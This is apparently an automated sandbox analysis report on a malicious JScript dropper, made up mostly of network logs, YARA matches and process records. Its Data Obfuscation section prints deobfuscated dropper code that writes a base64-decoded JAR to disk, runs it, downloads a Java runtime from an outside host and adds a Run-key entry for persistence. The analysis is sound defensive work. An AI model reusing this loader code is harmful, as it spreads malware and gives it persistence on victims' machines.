Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 58248 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58240 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58249
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58248
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58256
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58255
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58258
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58257
Source: unknown Network traffic detected: HTTP traffic on port 58212 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58252
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58251
Source: unknown Network traffic detected: HTTP traffic on port 58254 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58237 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58254
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58253
Source: unknown Network traffic detected: HTTP traffic on port 58260 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58250
Source: unknown Network traffic detected: HTTP traffic on port 58247 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58073 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58144 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58259
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58267
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58145
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58266
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58268
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58263
Source: unknown Network traffic detected: HTTP traffic on port 58230 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58262
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58144
Source: unknown Network traffic detected: HTTP traffic on port 58253 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58265
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58143
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58264
Source: unknown Network traffic detected: HTTP traffic on port 58227 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58261
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58260
Source: unknown Network traffic detected: HTTP traffic on port 58076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58267 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58242 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58238 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58256 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58262 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58235 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58151
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 58241 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58239 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58236 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58261 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58255 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58213 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58244 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58250 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58074 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58145 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58212
Source: unknown Network traffic detected: HTTP traffic on port 58233 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58178
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58211
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58151 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58213
Source: unknown Network traffic detected: HTTP traffic on port 58258 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58177
Source: unknown Network traffic detected: HTTP traffic on port 58264 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49831 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58074 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58073 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58107 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58105 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58106 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58113 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58145 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58143 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58144 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58151 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58178 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58175 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58177 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58184 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58212 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58211 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58213 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58220 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58227 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58225 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58226 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58228 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58231 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58229 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58230 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58232 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58233 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58234 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58235 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58236 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58237 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58238 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58239 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58240 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58241 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58242 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58243 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58244 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58245 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58246 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58247 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58248 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58249 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58251 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58250 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58252 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58253 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58254 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58255 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58256 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58257 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58258 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58259 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58260 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58261 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58262 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58263 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58264 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58265 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58267 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:58266 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:58268 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.3431081605.000000000A163000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: Process Memory Space: javaw.exe PID: 4524, type: MEMORYSTR Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Detected potential crypto function
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156CC771 2_3_156CC771
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156CC771 2_3_156CC771
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156CC771 2_3_156CC771
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156CC771 2_3_156CC771
Java / VBScript file with very long strings (likely obfuscated code)
Source: LYDI9MoZyu.js Initial sample: Strings found which are bigger than 50
Yara signature match
Source: 00000002.00000002.3431081605.000000000A163000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: Process Memory Space: javaw.exe PID: 4524, type: MEMORYSTR Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: classification engine Classification label: mal96.troj.evad.winJS@6/4@7/2
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\lugnisxncf.txt Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4984:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Mutant created: NULL
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: LYDI9MoZyu.js ReversingLabs: Detection: 15%
Source: javaw.exe String found in binary or memory: z-addToSubroutine
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LYDI9MoZyu.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\lugnisxncf.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\lugnisxncf.txt" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior

Data Obfuscation
barindex
JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var tempdir = wshShell.ExpandEnvironmentStrings("%temp%");var appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%");var r = Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 10);var stubpath = appdatadir + "\\" + r + ".txt"var decoded = decodeBase64(longText);writeBytes(stubpath, decoded);var fso = WScript.CreateObject("Scripting.FileSystemObject");var text = "";try{text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");}catch(err){}try{if(text == ""){text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");if(text != ""){text = text + "\\bin\\javaw.exe";}}else{text = text + "\\bin\\javaw.exe";}}catch(err){}try{if(text != ""){//wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + text + "\" -jar \"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + text + "\" -jar \"" + stubpath + "\"");} else{GrabJreFromNet();}} catch(err){}function GrabJreFromNet(){do{try{var xHttp = WScript.CreateObject("msxml2.serverxmlhttp.6.0");var bStrm = WScript.CreateObject("Adodb.Stream");xHttp.open("GET", "http://wshsoft.company/jv/jrex.zip", false);xHttp.setOption(2, 13056);xHttp.send();bStrm.Type = 1;bStrm.open();bStrm.write(xHttp.responseBody);bStrm.savetofile(appdatadir + "\\jre.zip", 2);break;}catch(err){WScript.Sleep(5000);}}while(true);UnZip(appdatadir + "\\jre.zip", appdatadir + "\\jre7");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion", "1.8", "REG_SZ");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\1.8\\JavaHome", appdatadir + "\\jre7", "REG_SZ");wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"");}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}function writeBytes(file, bytes){var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}function UnZip(zipfile, ExtractTo){if(fso.GetExtensionName(zipfile) == "zip"){if(!fso.FolderExists(ExtractTo)){fso.CreateFolder(ExtractTo);}var objShell = WScript.CreateObject("Shell.Application");var destination = objShell.NameSpace(ExtractTo);var zip_content = objShell.NameSpace(zipfile).Items(); for(i = 0; i < zip_content.Count; i++){if(fso.FileExists(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName
Yara detected AllatoriJARObfuscator
Source: Yara match File source: 00000002.00000002.3431081605.000000000A163000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3431081605.000000000A195000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 4524, type: MEMORYSTR
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Source: LYDI9MoZyu.js String : entropy: 5.62, length: 204574, content: 'd{1}FyIG5lbTQ0Ow0Kd{1}FyIGxvb{1}dUZXh0ID0gIlVFc0R{0}QlFAPkBDQD5AZ0lAPkBDcTh0{2}WdAPkBAPkBAPkBAPkBAP Go to definition
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156CA4D4 pushad ; retf 2_3_156CA4D5
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156CA4D4 pushad ; retf 2_3_156CA4D5
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156C848B push eax; iretd 2_3_156C8495
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156C848B push eax; iretd 2_3_156C8495
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156C8D9B push eax; ret 2_3_156C8DA5
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156C8D9B push eax; ret 2_3_156C8DA5
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156CA4D4 pushad ; retf 2_3_156CA4D5
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156CA4D4 pushad ; retf 2_3_156CA4D5
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156C848B push eax; iretd 2_3_156C8495
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156C848B push eax; iretd 2_3_156C8495
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156C8D9B push eax; ret 2_3_156C8DA5
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_156C8D9B push eax; ret 2_3_156C8DA5
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B823FB push es; retn 0001h 2_2_02B824FF
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_2_02B79091 push cs; retf 2_2_02B790B1
